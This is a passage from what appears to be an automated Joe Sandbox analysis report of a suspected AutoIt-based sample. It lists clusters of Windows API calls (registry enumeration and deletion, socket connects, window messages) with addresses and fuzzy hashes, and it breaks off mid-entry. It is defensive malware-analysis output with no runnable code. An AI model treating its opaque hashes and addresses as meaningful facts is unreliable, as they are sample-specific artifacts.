                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 3866635326-4108050209
                                                                                                                        • Opcode ID: 8bb6c2b1a6a26477e3d460ce01cd9a6df30a2ab67f5aa433becfcf6485c09b2a
                                                                                                                        • Instruction ID: 6442b8d4ec6fb617e44e8fb4b83acb7a41856f273bb16b594be69a1d428581a7
                                                                                                                        • Opcode Fuzzy Hash: 8bb6c2b1a6a26477e3d460ce01cd9a6df30a2ab67f5aa433becfcf6485c09b2a
                                                                                                                        • Instruction Fuzzy Hash: 24413EB5A00209EFEB21DF58D884EDABBF4FF09315F044169FA9697290D735A950CF90
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0100125C
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01001286
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0100133D
                                                                                                                          • Part of subcall function 0100122D: RegCloseKey.ADVAPI32(?), ref: 010012A3
                                                                                                                          • Part of subcall function 0100122D: FreeLibrary.KERNEL32(?), ref: 010012F5
                                                                                                                          • Part of subcall function 0100122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01001318
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 010012E0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 395352322-0
                                                                                                                        • Opcode ID: c78a1b3b2c6b2b8913be395337fe15103ba1ef712935c60c131d6c76c5194432
                                                                                                                        • Instruction ID: 8923490a7d1829e4744f05257aeb7d46c03c353d79d7bbaf774296e9fba01931
                                                                                                                        • Opcode Fuzzy Hash: c78a1b3b2c6b2b8913be395337fe15103ba1ef712935c60c131d6c76c5194432
                                                                                                                        • Instruction Fuzzy Hash: E13110B1901119BFEB26DB94D885EFFB7BCEF09300F0041A9F591E2180DB759A459BA0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0100655B
                                                                                                                        • GetWindowLongW.USER32(01695B68,000000F0), ref: 0100658E
                                                                                                                        • GetWindowLongW.USER32(01695B68,000000F0), ref: 010065C3
                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 010065F5
                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0100661F
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 01006630
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0100664A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2178440468-0
                                                                                                                        • Opcode ID: 6dddca6b2153cd8df989d8c473dddcab92a338c362db2456a4acc1fc954a2058
                                                                                                                        • Instruction ID: d60ebea77ea7c45d93e95495edbc9e06808151ce38cff72b9c814f4df45d1411
                                                                                                                        • Opcode Fuzzy Hash: 6dddca6b2153cd8df989d8c473dddcab92a338c362db2456a4acc1fc954a2058
                                                                                                                        • Instruction Fuzzy Hash: 15312A746042119FEB32CF68DC84F553BE2FB4A711F1802A8F5818B2EACB77A850DB41
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FF80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00FF80CB
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FF64D9
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF64E8
                                                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF6521
                                                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00FF652A
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00FF6534
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00FF655D
                                                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF6576
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 910771015-0
                                                                                                                        • Opcode ID: 5547ec47598a13cfd009bf21793a6a645337bef9fe0bb15ede8a366b44a70141
                                                                                                                        • Instruction ID: 764a57c0e6c6ff9bc53d670f60373880a3a7a9278524ebcd9e1cba213ea241a9
                                                                                                                        • Opcode Fuzzy Hash: 5547ec47598a13cfd009bf21793a6a645337bef9fe0bb15ede8a366b44a70141
                                                                                                                        • Instruction Fuzzy Hash: C231B531600118AFDB20EF64CC85BBE77A9EF44724F084059FA49E7291DF79AD05EBA1
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FDE0FA
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FDE120
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00FDE123
                                                                                                                        • SysAllocString.OLEAUT32 ref: 00FDE144
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00FDE14D
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00FDE167
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00FDE175
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 4471f280a719a3b6c0e5418d8d19f8a5303656bf76042136beed7145c20cc40c
                                                                                                                        • Instruction ID: e2578b7d6b266296d2be55b8fb972e926bc0236be243c08c5677f9edccfe9f20
                                                                                                                        • Opcode Fuzzy Hash: 4471f280a719a3b6c0e5418d8d19f8a5303656bf76042136beed7145c20cc40c
                                                                                                                        • Instruction Fuzzy Hash: D221A132604209AFDB20BFA8DC88DAA77EDEB09760B048126F954CB255DA75DC41EB60
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                        • Opcode ID: 29fb92b4d463ccacca6b5538d5fb21293f576e0359375471beeeacfe8c2965ad
                                                                                                                        • Instruction ID: 2b4d5499f83323ef33cf50d96f47efb7fc0d6a416606d5665f7cc7569071ced5
                                                                                                                        • Opcode Fuzzy Hash: 29fb92b4d463ccacca6b5538d5fb21293f576e0359375471beeeacfe8c2965ad
                                                                                                                        • Instruction Fuzzy Hash: C7216A7351425266D330B624DC12FA773D9EF56350F184437F88786241EB58AA95F291
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                                                                                                                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                                                                                                                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 010078A1
                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 010078AE
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 010078B9
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 010078C8
                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 010078D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                        • Opcode ID: 4774c825c72823cd76c06df730c69a18855f54406546139877957d151cf270c0
                                                                                                                        • Instruction ID: 54fad43b387abaf3f8b4ee8eaf498f00cceee408f5c8cea98b41c6f87bbfc3f0
                                                                                                                        • Opcode Fuzzy Hash: 4774c825c72823cd76c06df730c69a18855f54406546139877957d151cf270c0
                                                                                                                        • Instruction Fuzzy Hash: FC1193B2150119BFFF169E64CC85EE77F5DEF08758F014115F644A6090DA76AC21DBA0
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FA4292,?), ref: 00FA41E3
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00FA41EA
                                                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00FA41F6
                                                                                                                        • DecodePointer.KERNEL32(00000001,00FA4292,?), ref: 00FA4213
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                        • API String ID: 3489934621-340411864
                                                                                                                        • Opcode ID: 036ce60f8c390ce44012e441823ddb584d0fc40cd4f2778598c8471559783ba5
                                                                                                                        • Instruction ID: 58bec3698bd54e8dc8b61abbf5c0565b8c87e8431ff78f89984aa20fcbb7f7f1
                                                                                                                        • Opcode Fuzzy Hash: 036ce60f8c390ce44012e441823ddb584d0fc40cd4f2778598c8471559783ba5
                                                                                                                        • Instruction Fuzzy Hash: BAE01AF8A90341AFEB316BB1ED89B043AA4B765716F508428B491E909CDBBF6451AF00
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FA41B8), ref: 00FA42B8
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00FA42BF
                                                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00FA42CA
                                                                                                                        • DecodePointer.KERNEL32(00FA41B8), ref: 00FA42E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                        • API String ID: 3489934621-2819208100
                                                                                                                        • Opcode ID: 98a78d1ecb965fcb1bec187f6ccae06c91d7ef299421d1d85f3c856d633697c5
                                                                                                                        • Instruction ID: 0a464cd2d7cef763c8ae2bdee9cef55e529f84aa9219f21ad85bd8101e9eface
                                                                                                                        • Opcode Fuzzy Hash: 98a78d1ecb965fcb1bec187f6ccae06c91d7ef299421d1d85f3c856d633697c5
                                                                                                                        • Instruction Fuzzy Hash: 55E0BFBC641301ABDB31AB61EE4EB443AA4B715752F604018F481E505CCBBE5500EB14
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3253778849-0
                                                                                                                        • Opcode ID: ab4eb5b95743a44d51d7fadd3155ba3afd48b97ef46ff4ca0970a978f0b83e01
                                                                                                                        • Instruction ID: c66f08fd08f553599606132f3bf3b35d4e7c13186cc27759e06ab159f5e0e08f
                                                                                                                        • Opcode Fuzzy Hash: ab4eb5b95743a44d51d7fadd3155ba3afd48b97ef46ff4ca0970a978f0b83e01
                                                                                                                        • Instruction Fuzzy Hash: 6A61CB3050428A9BCF11FF21CC82FFE37A4AF45748F094519F8599B292DB78AD01EB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 010010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01000038,?,?), ref: 010010BC
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000548
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01000588
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 010005AB
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010005D4
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 01000617
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01000624
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4046560759-0
                                                                                                                        • Opcode ID: 201b23b6ea04d4d609f3f41ee7f9aa2c6001ef0ec681ff8984a194f2eea936bc
                                                                                                                        • Instruction ID: bcf35b4472ae34b445b7eff0f0500183f03b5822ac469d048eaccaeaf06c79a0
                                                                                                                        • Opcode Fuzzy Hash: 201b23b6ea04d4d609f3f41ee7f9aa2c6001ef0ec681ff8984a194f2eea936bc
                                                                                                                        • Instruction Fuzzy Hash: 6B516731208200AFEB15EB24CC85EAFBBE9FF88744F04491DF585872A1DB36E905DB52
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 01005A82
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 01005AB9
                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01005AE1
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 01005B50
                                                                                                                        • GetSubMenu.USER32(?,?), ref: 01005B5E
                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 01005BAF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 650687236-0
                                                                                                                        • Opcode ID: 232e72c68625a7112dd11e3edd1bd9af8e4c31941637a41d93a460431f8d7bdb
                                                                                                                        • Instruction ID: 204dda576fde7fa3fd505bff3bc00a78f87c5e4490d3399fa6cb7beac6466c94
                                                                                                                        • Opcode Fuzzy Hash: 232e72c68625a7112dd11e3edd1bd9af8e4c31941637a41d93a460431f8d7bdb
                                                                                                                        • Instruction Fuzzy Hash: AF519E35A00615AFDB12EF64CC45AAEBBB4EF48310F004099E941B7291CB79AE41DF90
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00FDF3F7
                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00FDF469
                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00FDF4C4
                                                                                                                        • _memmove.LIBCMT ref: 00FDF4EE
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00FDF53B
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FDF569
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1101466143-0
                                                                                                                        • Opcode ID: 1c1cbf6e0cade6d3716fed2ca9d10cc5dc039b7b097a10175bd01e4cb548e5a3
                                                                                                                        • Instruction ID: 59e28e2eb480d0c8d3f5284f22eef46408bdeafd0693209b93c86074c33e547b
                                                                                                                        • Opcode Fuzzy Hash: 1c1cbf6e0cade6d3716fed2ca9d10cc5dc039b7b097a10175bd01e4cb548e5a3
                                                                                                                        • Instruction Fuzzy Hash: 7D515BB5A0020A9FCB10DF58D880EAAB7F9FF48314B19816AED59DB305D734E915CBA0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FE2747
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2792
                                                                                                                        • IsMenu.USER32(00000000), ref: 00FE27B2
                                                                                                                        • CreatePopupMenu.USER32 ref: 00FE27E6
                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00FE2844
                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FE2875
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3311875123-0
                                                                                                                        • Opcode ID: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                                                                                                                        • Instruction ID: 9bb0c38701bbef31d5c3a92c8d048f34606b8c06d4fe48bfdc1083c710c1a680
                                                                                                                        • Opcode Fuzzy Hash: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                                                                                                                        • Instruction Fuzzy Hash: A751D270E00386DFDF65CF6AC888BAEBBF8BF44324F10415AE4159B291E7758A04EB51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F8179A
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F817FE
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F8181B
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F8182C
                                                                                                                        • EndPaint.USER32(?,?), ref: 00F81876
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
